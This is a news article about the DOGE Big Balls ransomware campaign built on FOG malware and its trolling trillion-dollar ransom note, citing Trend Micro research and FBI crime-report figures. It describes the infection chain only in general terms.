These DOGE ransowmare hackers demand a trillion dollar payment.
Update, April 25, 2025: This story, originally published April 23, has been updated with further details regarding the DOGE ransomware attack and information from a new FBI report about the FOG malware threat used following the latest trillion-dollar ransom note demand.
The same criminal group behind the DOGE Big Balls ransomware attack has just upped the ante. A newly updated ransom note sent to victims is now trolling Elon Musk and DOGE by demanding a ridiculous extortion fee of, and I trust you are sitting down, one trillion dollars from victims. This one has Dr Evil written all over it. Here’s everything you need to know about the DOGE ransomware attackers, the FOG malware they have adapted, and the nature of that outrageous ransom note demand.
DOGE Ransomware Attackers Troll Elon Musk
Although there is no doubt that ransomware threats should be taken very seriously, what with a massive surge in ransomware attacks this year, new password-cracking tools being employed to gain initial access, and some very concerning political moves by big names in the extortion-racket industry, not all the players take themselves as seriously it would seem. I certainly hope that’s the case as far as the DOGE ransomware attackers and the newly updated ransom note left for victims is concerned.
The ransomware group behind the recent DOGE Big Balls threat, using a variant of existing malware known as FOG, and trying to pin responsibility for the attacks on a well-known member of the Department of Government Efficiency team, has just updated its ransom note. The original threat was already bad enough, using a ZIP file with a deceptive shortcut to execute a multi-stage PowerShell infection chain exploiting a known Windows vulnerability, CVE-2015-2291, to gain kernel-level access and privilege escalation. The attack also, it has to be said, employed the political commentary and conspiracy theory tactic within the ransomware scripts and code. These included such things as “The CIA didn’t kill Kennedy you idiot. Oswald is a very deranged person that felt ostracized by his own country.“
Now, as detailed in an April 21 security report by researchers Nathaniel Morales and Sarah Pearl Camiling at Trend Micro, the ransomware appears to have started trolling DOGE and Elon Musk mercilessly. In reference to the now-infamous Musk demand for federal workers to email DOGE what they had achieved, leaving them fearing for their jobs if they did not comply, the ransom note has been altered to read:
“Give me five bullet points on what you accomplished for work last week or you owe me a TRILLION dollars.”
DOGE Ransomware Reflects ‘Most Pervasive Threat’ FBI Warning
In an April 23 FBI internet crime report, B. Chad Yarbrough, the FBI
operations director for criminal and cyber, confirmed that ransomware is “the most pervasive threat to critical infrastructure” and played an increasingly important role in the $16.6 billion cost of cybercrime to individuals and organizations in the U.S. across 2024. Interestingly, the FBI report said that the FOG ransomware threat, a variant of which has been used in the DOGE Big Balls attacks, was the most reported of new ransomware attacks during 2024. The bureau’s Internet Crime Complaint Center provides this information to field offices to help the FBI “identify new ransomware variants, discover the enterprises the threat actors are targeting, and determine whether critical infrastructure is being targeted,” the FBI said.
“The most alarming thing about the FBI’s IC3 report is that its numbers are just the tip of the formidable iceberg of organized cybercrime,” Dr Ilia Kolochenko, CEO at ImmuniWeb, said. Warning that a “growing number” of U.S. organizations prefer to silently settle with ransomware groups that carry a strong reputation for keeping attacks and data confidential following payment, Kolochenko said that it’s likely we will see this option continue to be taken. “In all cases,” Kolochenko advised, “the final decision to pay or not to pay should be brainstormed with cybercrime experts and lawyers having experience in such matters. Otherwise, you are running a sprint on thin ice.” In the case of the DOGE attacks, maybe less consideration is required when the demand is for a trillion dollars.
The FOG Malware Behind The DOGE Ransomware Threat
“The ransomware payload embedded in the samples has been verified as FOG ransomware,” the Trend Micro report warned, “an active ransomware family targeting both individuals and organizations.”
“FOG ransomware is a relatively new ransomware family that enterprises must add to their watchlist,” Trend Micro said, adding that “the impact of a successful ransomware attack could still potentially cost enterprises financial loss and operational disruption,” regardless of the DOGE references and the trolling nature of the ransom note itself.
The security researchers noted that the FOG ransomware itself has compromised some 100 victims in the first three months of the year, before the DOGE-trolling started, it would seem. In January, there were 18 victims, 53 in February and 29 in March.
Trend Micro said that the de-obfuscated script in the ransom note executed a PowerShell command which performs a multi-stage operation: retrieving a ransomware loader (cwiper.exe), ktool.exe and other PowerShell scripts. “It also opens politically themed YouTube videos and includes written political commentary directly in the script,” the report stated, which adds to the trolling-element of the attack.
FOG also takes your security very seriously, at least as far as stopping defenders from analyzing the malware is concerned. “We have observed that prior to dropping its payload,” the security researchers confirmed, “the malware investigated checks various indicators, such as processor count, RAM, MAC address, registry, and tick count, to detect a sandbox.” If any of these security checks should fail, then FOG will exit the entire process.
Should You Take The DOGE Ransom Note Seriously?
As such, it’s imperative that you do not think that just because the attackers might act like clowns, the threat itself isn’t serious.
Indeed, the ransomware demand itself is all business. “We are the ones who encrypted your data and also copied some of it to our internal resource,” the attackers state. They then advise the victim that the sooner they are contacted, the sooner they can get everything resolved, offering instructions on using a Tor browser to get the next steps.
The DOGE references are not the only trolling in the updated ransom note, there’s also a “Don’t snitch now” warning. This could be in response to the ransomware informer platform that I have previously reported on. The humor — I guess that’s what it is an attempt at — continues with a warning from the attackers that they have “grabbed your trilatitude and trilongitude (the most accurate) coordinates of where you live,” in order to prove that they are lying. Not lying and not funny, but not to be ignored either.
